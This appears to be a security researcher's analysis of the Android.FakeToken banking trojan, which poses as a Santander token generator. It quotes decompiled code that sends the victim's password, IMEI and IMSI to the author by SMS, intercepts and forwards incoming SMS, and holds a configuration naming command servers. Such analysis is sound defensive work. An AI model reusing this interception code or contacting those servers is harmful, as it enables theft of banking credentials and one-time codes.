Intro: What is Android.FakeToken?
This new malware-family emerged some days ago within a spanish Spam-campain and spreads through email and SMS messages. This new Android malware tries to forward mTAN SMS messages to a remote user and thus has the typical man-in-the-middle functionality, we have already seen in malware families like Zeus and SpyEye, but it also can be controlled remotely and doesn’t need to infect the user’s PC.
Analysis of the Application and Its Structure
When installing the app it requests the following permissions:
- android.permission.READ_PHONE_STATE
- android.permission.ACCESS_NETWORK_STATE
- android.permission.SEND_SMS
- android.permission.RECEIVE_SMS
- android.permission.INTERNET
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INSTALL_PACKAGES
- android.permission.DELETE_PACKAGES
- android.permission.READ_CONTACTS
- android.permission.RECEIVE_BOOT_COMPLETED
After the application has been installed successfully, the icon of the app shows up in the dashboard and the application registers some receivers which will trigger when a specific system event occurs (for example: BOOT_COMPLETED, USER_PRESENT, PHONE_STATE or SMS_RECEIVED). When the user executes the app, it shows a WebView component that displays an html-page which looks like a Token-Generator and it appears to be from the targeted bank (in our case it should look like the Santander Consumer Bank):
localWebView.addJavascriptInterface(new WebApi(this), "android"); System.out.println("Build.VERSION.RELEASE: " + Build.VERSION.RELEASE); if ((Build.VERSION.RELEASE.startsWith("2.3.1")) || (Build.VERSION.RELEASE.startsWith("2.3.3"))) localWebView.loadUrl("file:///android_asset/html/index_bag.html"); ....
To get the fake token (just a random number), the user must enter the first factor of authentication. As soon as this step is done, the application sends a SMS message to the author and starts a background service afterwards:
public void sendPass(String paramString) { try { if (!Settings.saved.sendInitSms) { Settings.saved.sendInitSms = true; String str = Settings.saved.smsPrefix + " INIT " + MainApplication.imei + " " + MainApplication.imsi + " " + paramString; MainService.sendSms(Settings.saved.number, str); MainApplication.settings.save(this.context); } ....
This background service is listening to commands from the remote server (e.g. update of configuration) and starts periodically. When the smartphone of the victim receives a SMS message, the broadcast will be aborted and the message will be forwarded to a given phone number or remote server.
abortBroadcast(); SmsMessage localSmsMessage = arrayOfSmsMessage[j]; String str1 = localSmsMessage.getOriginatingAddress(); String str2 = localSmsMessage.getMessageBody(); CatchResult localCatchResult = MainApplication.settings.isCatchMessage(str1, str2); if (localCatchResult.result) MainService.start(paramContext, paramIntent, "catch", str1, str2, localCatchResult.key); if ((MainApplication.settings.isNewServer(paramContext, str1, str2)) || (MainApplication.settings.isDeleteMessage(str1, str2)))
The application sends IMEI, IMSI, phone type, version, sid, phone number and the SMS body within a HTTP Post to one of the corresponding remote servers. These servers and all necessary information are stored in a xml configuration (/data/data/token.generator/files/settings):
79021121067 1.0 santander http://icoolshop.ru/cp/server.php http://iconsshopbest.com/cp/server.php qe4faf23r4e2 sid_1 false 1331934321409 43200
This file can be updated remotely (via SMS and HTTP GET) if the phone number or server address of the malware author changes. The malware also has the ability to install further apk-files and sends the phone numbers of all entries in the address book of the victim to a remote server. The last step happens probably for further distribution of the malware.
Sample Information:
sha256:
f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79
md5:
4548973449f707a6359a9b321ef54d31